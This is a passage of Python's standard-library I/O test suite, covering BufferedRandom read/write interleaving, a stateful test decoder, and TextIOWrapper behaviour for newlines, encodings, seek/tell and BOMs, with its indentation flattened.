bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
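        # For instance, with the 4-byte buffer below over b"A" * 10, read(1)
        # pulls several bytes of readahead from the raw stream past the
        # logical position 1; the following write must seek the raw stream
        # back to that logical position before its data is flushed, otherwise
        # the overwrite would land too far forward.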
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
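    # A sketch of the state round-trip implied by getstate()/setstate(): with
    # self.i == 3, self.o == 6 and an empty buffer, getstate() returns
    # (b'', 2*100 + 7) == (b'', 207), since 3 ^ 1 == 2 and 6 ^ 1 == 7; feeding
    # (b'', 207) back into setstate() gives divmod(207, 100) == (2, 7), and
    # the XOR restores i == 3, o == 6.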
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
            for enc in "ascii", "latin-1", "utf-8":  # , "utf-16-be", "utf-16-le"
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
        # Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(support.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
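        # (Note: 'aaaxxx'.encode(charset) itself contains exactly one leading
        # BOM for these charsets, which is why the appended file contents can
        # be compared against it directly below.)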
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
